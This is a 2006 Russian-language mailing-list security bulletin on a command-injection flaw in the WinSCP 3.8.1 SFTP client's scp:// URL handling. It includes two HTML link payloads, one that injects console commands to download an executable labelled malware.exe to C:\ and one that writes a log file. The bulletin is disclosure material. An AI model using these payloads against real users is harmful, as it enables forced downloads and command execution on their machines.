Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в WinSCP. (comp.paper.supuser) : Рассылка : Subscribe.Ru

IT-безопасность в быту и не только

Рассылка закрыта

При закрытии подписчики были переданы в рассылку "Безопасность. Статьи, новости, комментарии" на которую и рекомендуем вам подписаться.

Вы можете найти рассылки сходной тематики в Каталоге рассылок.

← Июнь 2006 →
	1	2 02.06.2006 07:05:16 13:05:11 17:05:16	3	4
5	6	7	8 08.06.2006 07:05:38 13:05:05	9 09.06.2006 07:05:21 13:05:14	10	11
12 12.06.2006 07:05:17 13:05:08 14:05:06 17:05:04	13 13.06.2006 07:05:43 12:05:12 16:05:07	14 14.06.2006 07:05:28 12:05:09 16:05:10	15 15.06.2006 07:05:59 12:05:12 16:05:12	16 16.06.2006 07:05:15 12:05:11 16:05:09	17 17.06.2006 07:05:31 12:05:06 16:05:06	18 18.06.2006 07:05:13 10:05:28
19 19.06.2006 10:50:51 10:58:02 11:41:37 11:54:53 13:13:16	20 20.06.2006 07:05:46 10:05:25 13:05:10 16:30:44 18:05:09	21 21.06.2006 07:05:24 10:14:50 13:28:47 16:21:39 18:05:09	22 22.06.2006 07:05:43 11:54:16 13:17:13 15:46:04 17:18:39	23 23.06.2006 07:05:29 10:05:21 12:05:14 15:05:06 17:05:10	24 24.06.2006 07:05:23 10:05:17 12:05:12 17:05:06	25 25.06.2006 07:05:39 10:05:16 12:05:08 15:05:10 17:05:07
26 26.06.2006 07:05:26 10:05:20 12:07:14 15:05:25 17:08:47	27 27.06.2006 07:05:33 10:05:22 12:05:11 16:34:56 17:18:42	28 28.06.2006 07:05:32 10:05:43 12:13:49 15:05:13	29 29.06.2006 07:05:34 10:05:48 12:05:15 15:05:13 17:05:24	30 30.06.2006 07:05:44 10:05:24 12:05:09 15:05:10 17:05:11

Автор

Forester

Статистика

1.394 подписчиков
-1 за неделю

← Все выпуски →

Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в WinSCP.

Компьютер для продвинутых пользователей

В этом выпуске:

WinSCP

ПО: WinSCP
Версия: 3.8.1

О WinSCP:
SFTP клиент для Windows использующий SSH и имеющий открытый код. Протокол Legacy SCP входит в поддержку.
Уязвимость:
Строка ввода (scp:// sftp://) не проверяется, что может нам обеспечить возможность вставлять любые команды.
Если вы создадите HTML страницу со следующий содержанием:
<a href="scp://user:password@host:22/%22%20/console%20/command%20%22lcd% 20c:\%22%20%22get%201.exe%22%20exit">download malware.exe</a>
и кликните по ссылке, то вы автоматически скачаете malware.exe с С:\.
Щелкнув на <a href="scp://jelmer@127.0.0.1:22/%22%20%22/log=c:%5csomefile%22"log</a> мы получаем файл 'somefile'.

Не забудьте проголосовать за выпуск!

Рассылка создана и ведется при поддержке Информационной сети Пермского края.

Меня можно найти:	ICQ - 273214003
	e-mail - isdmi1::mail.ru

В избранное

← Июнь 2006 →
			1	2 02.06.2006 07:05:16 13:05:11 17:05:16	3	4
5	6	7	8 08.06.2006 07:05:38 13:05:05	9 09.06.2006 07:05:21 13:05:14	10	11
12 12.06.2006 07:05:17 13:05:08 14:05:06 17:05:04	13 13.06.2006 07:05:43 12:05:12 16:05:07	14 14.06.2006 07:05:28 12:05:09 16:05:10	15 15.06.2006 07:05:59 12:05:12 16:05:12	16 16.06.2006 07:05:15 12:05:11 16:05:09	17 17.06.2006 07:05:31 12:05:06 16:05:06	18 18.06.2006 07:05:13 10:05:28
19 19.06.2006 10:50:51 10:58:02 11:41:37 11:54:53 13:13:16	20 20.06.2006 07:05:46 10:05:25 13:05:10 16:30:44 18:05:09	21 21.06.2006 07:05:24 10:14:50 13:28:47 16:21:39 18:05:09	22 22.06.2006 07:05:43 11:54:16 13:17:13 15:46:04 17:18:39	23 23.06.2006 07:05:29 10:05:21 12:05:14 15:05:06 17:05:10	24 24.06.2006 07:05:23 10:05:17 12:05:12 17:05:06	25 25.06.2006 07:05:39 10:05:16 12:05:08 15:05:10 17:05:07
26 26.06.2006 07:05:26 10:05:20 12:07:14 15:05:25 17:08:47	27 27.06.2006 07:05:33 10:05:22 12:05:11 16:34:56 17:18:42	28 28.06.2006 07:05:32 10:05:43 12:13:49 15:05:13	29 29.06.2006 07:05:34 10:05:48 12:05:15 15:05:13 17:05:24	30 30.06.2006 07:05:44 10:05:24 12:05:09 15:05:10 17:05:11